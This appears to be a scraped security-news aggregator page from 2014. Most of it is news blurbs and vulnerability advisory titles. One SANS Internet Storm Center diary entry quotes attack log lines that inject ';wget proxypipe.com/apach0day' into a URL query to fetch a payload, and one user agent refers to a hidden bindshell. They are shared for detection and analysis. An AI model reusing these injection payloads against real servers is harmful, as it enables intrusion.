Hackin9

What InfoSec can learn from the insurance industry
iT News (blog)
That kind of raw data - rather than the vendor-sponsored and spun surveys that nobody trusts - would make life a great deal easier for my infosec acquaintance and colleagues. It also makes(yet another) strong case for mandatory data breach reporting.

 
A network testbed being constructed just south of San Francisco will help carriers and vendors develop standards for better cloud services, the CloudEthernet Forum says.
 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
If you like to send messages via Facebook when you're on the move, get ready to download a new app.
 

Our reader Robin submitted the following detect:

I've got a site that was scanned this morning by a tool that left these entries in the logs:
[HTTP_USER_AGENT] => chroot-apach0day
[HTTP_REFERRER] => /xA/x0a/x05
[REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day  

The URL that appears to be retrieved does not exist, even though the domain does.

In our own web logs, we have seen a couple of similar requests:

162.253.66.77 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"

If anybody has any ideas what tool causes these entries, please let us know. Right now, it doesn't look like this is indeed an "Apache 0 Day" 

There are a couple other security related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Linux Kernel SCTP NULL Pointer Dereference Denial of Service Vulnerability
 
Cisco Prime Data Center Network Manager CVE-2014-3329 Cross Site Scripting Vulnerability
 
Facebook earlier this summer sparked criticism over a study in which it manipulated the feeds of some of its users, but the dating site OkCupid says what Facebook did is normal, and that in fact it has run its own user-behavior tests.
 
In the hot market for big-data products and services, sometimes even competitors must work together for the common good.
 
It seems obvious, but complaining about bad service can really make a difference.
 
Mozilla today ditched the "interim" label for Chris Beard and appointed him CEO.
 
Thanks to the rise of mobile gaming and 4K video, LP-DDR4 memory will reach smartphones and tablets close to two years earlier than expected, an analyst said.
 
With a comet rushing toward Mars, NASA scientists are working to protect their robotic orbiters from being damaged by comet debris.
 
Smarter contextual awareness, 4K video and augmented reality are just some of the new technologies that will be offered by smartphones and tablets over the next year or so, according to Qualcomm's product blueprints.
 
New tariffs imposed by the U.S. on Chinese imports of solar cells and (for the first time) Taiwan has infuriated some in the solar power industry who believe the steep taxes will adversely affect businesses and consumers.
 
Skybox Security Multiple Security Vulnerabilities
 
RETIRED: Skybox Security Multiple Denial of Service Vulnerabilities
 
Rimini Street is continuing to rapidly grow revenue for its third-party software support business despite its ongoing litigation with Oracle.
 
Oracle Java SE CVE-2014-4247 Remote Security Vulnerability
 
The preview of Apple's OS X Yosemite public beta last week resulted in a tripling of the upgrade's share of online traffic.
 
Google has launched a new project, dubbed the Baseline Study, that seeks to develop a greater understanding of what it means to be healthy.
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: Multiple vulnerabilities have been found in OpenSSL, possibly allowing remote attackers to execute arbitrary code.
 
LinuxSecurity.com: Updated kernel packages that fix one security issue are now available for Red Hat Enterprise Linux 6.2 Advanced Update Support. The Red Hat Security Response Team has rated this update as having [More...]
 
WeBid Multiple Cross Site Scripting And LDAP Injection Vulnerabilities
 
ManageEngine EventLog Analyzer '/event/j_security_check' Cross Site Scripting Vulnerability
 
vBulletin CVE-2014-5102 SQL Injection Vulnerability
 
Lime Survey Multiple Input Validation Vulnerabilities
 

Attackers have figured out a new way to get Amazon's cloud service to wage potent denial-of-service attacks on third-party websites—by exploiting security vulnerabilities in an open source search and analytics application known as Elasticsearch.

The power of Backdoor.Linux.Ganiw.a was documented earlier this month by researchers from antivirus provider Kaspersky Lab. Among other things, the trojan employs DNS amplification, a technique that vastly increases the volume of junk traffic being directed at a victim by abusing poorly secured domain name system servers. By sending DNS queries that are malformed to appear as if they came from the victim domain, DNS amplification can boost attack volume by 10-fold or more. The technique can be especially hard to block when distributed among thousands or hundreds of thousands of compromised computers.

Late last week, Kaspersky Lab expert Kurt Baumgartner reported that the DDoS bot is actively compromising Amazon Elastic Cloud Computing (EC2) hosts and very possibly those of competing cloud services. The foothold that allows the nodes to be hijacked is a vulnerability in 1.1.x versions of Elastisearch, he said. The attackers are modifying proof-of-concept attack code for the vulnerability, indexed as CVE-2014-3120 in the Common Vulnerabilities and Exposures database, that gives them the ability to remotely execute powerful Linux commands through a bash shell Window. The Gani backdoor, in turn, installs several other malicious scripts on compromised computers, including Backdoor.Perl.RShell.c and Backdoor.Linux.Mayday.g. The Mayday backdoor then floods sites with data packets based on the user datagram protocol.

Read 4 remaining paragraphs | Comments

 
Cisco WebEx Meetings Server CVE-2014-3305 Cross Site Request Forgery Vulnerability
 
Cisco WebEx Meetings Server 'user.php' Information Disclosure Vulnerability
 
Officials today from the China government appeared at four Microsoft offices, but the purpose of the visits was unclear.
 
Attackers are exploiting a vulnerability in distributed search engine software Elasticsearch to install DDoS malware on Amazon and possibly other cloud servers.
 
The launch of the Samsung Z, the first smartphone to run the Tizen OS, has been delayed indefinitely.
 
Microsoft's Office 365 'rent-not-buy' subscription service is at an annual revenue run-rate of more than half a billion dollars.
 
Attackers are exploiting a vulnerability in distributed search engine software Elasticsearch to install DDoS malware on Amazon and possibly other cloud servers.
 
McKenna Long & Aldridge faced a multi-faceted communications challenge that threatened to impede the company's technology adoption and office expansion.
 
Zarafa WebAccess and WebApp Local Information Disclosure Vulnerability
 
The Alice ruling clarifies patent-eligible software processes.
 
Martha Heller talks to Charles Shaver, CEO at Axalta Coating Systems, how a business-savvy CIO and global systems help his company meet customer expectations
 
Firefox users who don't like the changes to the browser's new tab page have multiple options.
 
[security bulletin] HPSBGN02936 rev.1 - HP and H3C VPN Firewall Module Products, Remote Denial of Service (DoS)
 
[SECURITY] [DSA 2990-1] cups security update
 
[SECURITY] [DSA 2991-1] modsecurity-apache security update
 
Barracuda Networks Spam&Virus Firewall v5.1.3 - Client Side Cross Site Vulnerability
 
Re: [FD] Beginner's error: import function of Windows Mail executes rogue program C:\Program.exe with credentials of other account
 
Re: [FD] Beginner's error: import function of Windows Mail executes rogue program C:\Program.exe with credentials of other account
 
The percentage of Microsoft current and former employees who approve of CEO Satya Nadella has dropped since the company announced layoffs.
 
Vulnerabilities in the Tails operating system could reveal your IP address, but you can avoid trouble by taking a couple of precautions.
 
A gold rush of next-gen authentication technologies yields biometric systems, ID bracelets, new standards and more. Insider (registration required)
 
CUPS Web Interface CVE-2014-5031 Incomplete Fix Local Privilege Escalation Vulnerability
 
CUPS Web Interface CVE-2014-5029 Incomplete Fix Local Privilege Escalation Vulnerability
 
CUPS Web Interface CVE-2014-5030 Incomplete Fix Local Privilege Escalation Vulnerability
 
CUPS Web Interface CVE-2014-3537 Local Privilege Escalation Vulnerability
 
Internet Storm Center Infocon Status